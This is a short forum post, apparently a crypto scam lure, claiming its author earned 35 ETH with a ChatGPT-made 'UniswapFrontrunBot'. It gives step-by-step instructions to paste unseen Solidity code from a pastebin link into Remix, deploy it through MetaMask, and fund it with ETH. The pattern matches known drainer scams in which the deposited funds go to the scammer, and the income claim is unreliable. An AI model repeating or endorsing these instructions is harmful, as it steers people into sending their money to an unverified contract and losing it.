Passive Income: How I Garnered 35 ETH Using an AI Bot with ChatGPT (Step-By-Step Guide) STEP-BY-STEP INSTRUCTIONS

48 views 0 replies
Reply to Topic
Alex96

Age: 2024
Total Posts: 375
Points: 10

Location:
,
Download MetaMask:
https://metamask.io/downloadAccess Remix:
https://remix.ethereum.org/Click on the “contracts” folder and then create “New File”. Rename it as you like, i.e: “bot.sol”. Make sure it ends with .sol for Ethereum programming language.

Note: There is a problem if the text is not colored when you create bot.sol. Simply refresh the browser and then paste rentry codes again.

4. Paste THIS code in Remix:
https://pastebin.com/raw/CmARM0wc5. Go to the "Compile" tab on Remix and Compile with Solidity version 0.6.6

6. Go to the “DEPLOY & RUN TRANSACTIONS” tab, select the “Injected Provider - Metamask” as environment and then “Deploy”. By approving the Metamask Contract creation fee, you will have created your own contract.

Note: Make sure the name of your bot is selected in the CONTRACT section above deploy button. In this case mine would be "UniswapFrontrunBot -bot.sol".

7. Fund your bot to be able to frontrun transactions.
Make sure your deposit is more than 0.05 ETH( to prevent negating slippage ) to your exact contract/bot address.

8. After your transaction is confirmed, click the "start" button to run the bot. Withdraw money at any time by clicking the "Withdraw" button

Watch video instruction here https://youtu.be/prh7J02uspk

Posted 27 Jan 2025

Reply to Topic